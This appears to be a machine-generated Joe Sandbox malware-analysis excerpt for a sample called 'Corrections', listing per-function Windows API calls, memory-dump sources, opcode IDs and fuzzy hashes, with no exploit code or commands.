                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                            • Opcode ID: 9a24b367f7db03c9d2a79977a63439e52b4fda9f13cc63913b4a474fba6b5139
                                                                                                                                                                                                                                                                                            • Instruction ID: a0c553f4430c0d3287e9ac7ccd908976f2d451f6d25cfdb300e55dd6874e99c5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a24b367f7db03c9d2a79977a63439e52b4fda9f13cc63913b4a474fba6b5139
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78D14671508211AFD700EF68D881E6BB7E8EFD8708F40496DF5858B2A2DB71ED45CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0
                                                                                                                                                                                                                                                                                            • BeginPaint.USER32(?,?,?), ref: 00921B35
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00921B99
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00921BB6
                                                                                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00921BC7
                                                                                                                                                                                                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00921C15
                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00963287
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921C2D: BeginPath.GDI32(00000000), ref: 00921C4B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 66dfd7bd04c8b8309bc65042df73c3d35106b77e2c9187a71378b4c6c81e4682
                                                                                                                                                                                                                                                                                            • Instruction ID: 5015bcc20674d5bcb174e3765a9f99a84efa830e5e977ccea349b0103862c6b8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66dfd7bd04c8b8309bc65042df73c3d35106b77e2c9187a71378b4c6c81e4682
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD41DE70109310AFD710DF28ED84FB67BA8EB55330F100669FAA48B2B5D7709944EB62
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 009911B3
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 009911EE
                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0099120A
                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00991283
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0099129A
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 009912C8
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                                            • Opcode ID: abe359f5ccc7e0ec36610ae4ecb6a7875314e30c590952e505c86724339e6447
                                                                                                                                                                                                                                                                                            • Instruction ID: 6ead5b2c9e5f5596f8a4c7d8e6302f26cfd0e27c08fe971de66b4ae5637fb302
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abe359f5ccc7e0ec36610ae4ecb6a7875314e30c590952e505c86724339e6447
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44415A71914205EFDF04AF58DC85AAAB7B8FF88310F1440A5EE009B296DB30DE51DBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0097FBEF,00000000,?,?,00000000,?,009639E2,00000004,00000000,00000000), ref: 009B8CA7
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 009B8CCD
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 009B8D2C
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 009B8D40
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 009B8D66
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 009B8D8A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2046b885c4b2828121bec61fcfe29e5239c7156e9c1443347acce8c7ef863802
                                                                                                                                                                                                                                                                                            • Instruction ID: 0f822a9b1d975c7cc99f9d7710f074b93af4f77cc8a80ceddae2e1b4ed726d09
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2046b885c4b2828121bec61fcfe29e5239c7156e9c1443347acce8c7ef863802
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0541F9B0606244AFDB25CF24CB89BE27FF8FB4D324F1401A9E5484B2B2CB716845DB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 009A2D45
                                                                                                                                                                                                                                                                                              • Part of subcall function 0099EF33: GetWindowRect.USER32(?,?), ref: 0099EF4B
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 009A2D6F
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 009A2D76
                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 009A2DB2
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 009A2DDE
                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009A2E3C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ae3dec1611d889d618a21f33f81d899ed77aad272b37f9e8f041354c8fe7ed7
                                                                                                                                                                                                                                                                                            • Instruction ID: 629da89eb494f3b5558387c3535ee6af6416c5842d559dfeb08a4fd3ffdb029d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ae3dec1611d889d618a21f33f81d899ed77aad272b37f9e8f041354c8fe7ed7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7031B07250A315ABD720DF18D849F9BB7A9FFC5364F000A1AF49597182DA70E909CBE2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 009855F9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00985616
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0098564E
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0098566C
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00985674
                                                                                                                                                                                                                                                                                            • _wcsstr.LIBVCRUNTIME ref: 0098567E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 72514467-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7eff3e27faa4985a407df197615ed9012d9772e33f1470d4bff7e8aafb8d1bd6
                                                                                                                                                                                                                                                                                            • Instruction ID: 2e205b7093e62aab046611abc97f6df5beb395774c2156fe4b008efdcee64a30
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7eff3e27faa4985a407df197615ed9012d9772e33f1470d4bff7e8aafb8d1bd6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43210472208600BBEB166B24DC49F7F7BACDF88720F154069F905CA291FE75CC419760
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00925851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009255D1,?,?,00964B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00925871
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009962C0
                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 009963DA
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(009C0CC4,00000000,00000001,009C0B34,?), ref: 009963F3
                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00996411
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                                                            • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                            • Opcode ID: 5ffa07723edf3ae9768718ed3f3b2f0a2c545944ae6e5fb65adf74d51c61b7cd
                                                                                                                                                                                                                                                                                            • Instruction ID: c612dab79470902e86591f5fc1c2079ac17a41a46001c43374b2805dce9488d7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ffa07723edf3ae9768718ed3f3b2f0a2c545944ae6e5fb65adf74d51c61b7cd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AD13375A082119FCB14DF28C484A2ABBF9FF89714F15895DF8899B361CB31EC45CB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 009B8740
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 009B8765
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 009B877D
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 009B87A6
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0099C1F2,00000000), ref: 009B87C6
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 009B87B1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9a5e38b1febf55896e51dcad0b87ea1a78344d30b96c26b8017ba295f83e3bfb
                                                                                                                                                                                                                                                                                            • Instruction ID: 0dad15e36acf4f48fadde5902b97d2f11a5adc351d285fa0611996bc78226aca
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a5e38b1febf55896e51dcad0b87ea1a78344d30b96c26b8017ba295f83e3bfb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C82171716252459FCB145F38CE88AAB37ADEB49379F244729B926C21E0EE708850DB10
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,009436E9,00943355), ref: 00943700
                                                                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0094370E
                                                                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00943727
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,009436E9,00943355), ref: 00943779
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                            • Opcode ID: df89b1691e4e3622948a5e9895284c5c71e26960b59b17fa295472e54d499287
                                                                                                                                                                                                                                                                                            • Instruction ID: d3dd2ea5b9dd322e378f34e236e5cdab3629fcae1544b191f80e533adc7b6b24
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df89b1691e4e3622948a5e9895284c5c71e26960b59b17fa295472e54d499287
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17014CB256F3116EA62427B5BDC6F673AD8EB4A7767348339F150441F2EF114E01A240
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00944D53,00000000,?,?,009468E2,?,?,00000000), ref: 009530EB
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095311E
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00953146
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00953153
                                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 0095315F
                                                                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 00953165
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 77a294396fd96b70eca82d11a4e8c12d527fee7a706227f9ca0ee29105521c8e
                                                                                                                                                                                                                                                                                            • Instruction ID: e804b3caf1405fb3410eb068409041fbfd62c945a21c623a09e304dac30ea9d4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77a294396fd96b70eca82d11a4e8c12d527fee7a706227f9ca0ee29105521c8e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58F0F43650D90027C222E737AC06B6A236A9FC17B7F248518FD24D22D2FE248E0E5361
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00921F87
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921F2D: SelectObject.GDI32(?,00000000), ref: 00921F96
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921F2D: BeginPath.GDI32(?), ref: 00921FAD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00921F2D: SelectObject.GDI32(?,00000000), ref: 00921FD6
                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 009B94AA
                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 009B94BE
                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 009B94CC
                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 009B94DC
                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 009B94EC
                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 009B94FC
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 25f7d15b68fc97c053e598ead20f196ffe36a9dbc4f658e27b29d7fb366f2de1
                                                                                                                                                                                                                                                                                            • Instruction ID: a0a358fa62d8bbf988c63897ab146210b5db0e26fb7dcb0f5a36443d8a628d3e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25f7d15b68fc97c053e598ead20f196ffe36a9dbc4f658e27b29d7fb366f2de1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8511097601510DBFDB129F90DD88FEA7F6DEB08360F048111FA194A161D7719D55EBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00985B7C
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00985B8D
                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00985B94
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00985B9C
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00985BB3
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00985BC5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 23fe8ac9240b97ccb1dc6071d0d57aa7755bcfa2f60878369dad1af7fb7950dc
                                                                                                                                                                                                                                                                                            • Instruction ID: fcb9e26e1011e089801301b8f3bc3a10e1b9d88ae6af30bc3833766f0ab8de2d
